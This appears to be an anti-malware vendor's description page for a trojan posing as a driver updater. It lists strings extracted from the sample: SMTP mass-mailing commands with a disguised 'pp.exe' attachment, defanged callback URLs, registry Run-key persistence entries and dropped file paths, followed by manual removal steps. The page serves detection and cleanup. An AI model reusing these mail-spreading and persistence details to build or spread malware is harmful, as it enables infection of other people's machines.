# Fatal libcurl error
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Internal error clearing splay node = %d
Internal error removing splay node = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
USER %s
STARTTLS denied. %c
Access denied. %c
PASS %s
RETR %s
LIST %s
POP3S not supported!
login
password
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s STARTTLS
%s LOGOUT
IMAPS not supported!
SMTP
LOGIN
EHLO %s
HELO %s
No known auth mechanisms supported!
AUTH %s %s
AUTH %s
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
SMTPS not supported!
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
Host: %s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
HTTP/1.%d %d
Received HTTP code %d from proxy after CONNECT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Could not resolve proxy: %s; %s
Could not resolve host: %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
%d.%d.%d.%d
Unsupported protocol
URL using bad/illegal format or missing URL
FTP: weird server reply
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with known CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized HTTP Content-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%c%c%c%c
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Disposition: attachment; filename="%s"
; filename="%s"
Content-Type: %s
couldn't open file "%s"
--%s--
d:\DRPSuUpdater\bin\Release\DrvUpdater.pdb
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe
2/}'1~'0
GetProcessHeap
GetConsoleOutputCP
GetCPInfo
RegOpenKeyA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ShellExecuteA
ShellExecuteExA
1<' 3'$%
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
KERNEL32.DLL
\DRPSu\DrvUpdater.exe
ntdll.dll
Windows
Windows has found a new device. Download and install a specific driver to enable the device.
<a>Use the Web service to download driver </a>

%original file name%.exe_3380_rwx_00479000_00001000:

.idata
.reloc
KERNEL32.dll

DrvUpdater.exe_812_rwx_0046D000_00001000:

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

DrvUpdater.exe_812_rwx_00470000_00001000:

btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll

DrvUpdater.exe_812_rwx_00474000_00004000:

USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll

DrvUpdater.exe_812_rwx_00479000_00001000:

.idata
.reloc
KERNEL32.dll

Explorer.EXE_1440_rwx_01C50000_00001000:

C:\Windows\system32\runouce.exe

Explorer.EXE_1440_rwx_02D70000_00001000:

C:\Windows\system32\Serverx.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3404

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.xml (113 bytes)
    C:\Windows\System32\Serverx.exe (1504988 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.Run.bat (127 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe (1281 bytes)
    C:\Windows\System32\runouce.exe (1504988 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (2904 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "DrvUpdater" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Serverx" = "C:\Windows\system32\Serverx.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Runonce" = "C:\Windows\system32\runouce.exe"

  6. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  7. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  8. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now